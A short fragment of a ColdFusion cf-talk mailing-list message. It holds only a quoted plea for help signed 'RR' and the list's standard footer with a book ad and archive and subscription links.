> > > >
> > > > I am sure I did something wrong.  Any suggestions
> > > >
> > > > RR
> > >
> > >
> > >
> >
> >
>
> 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344487
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm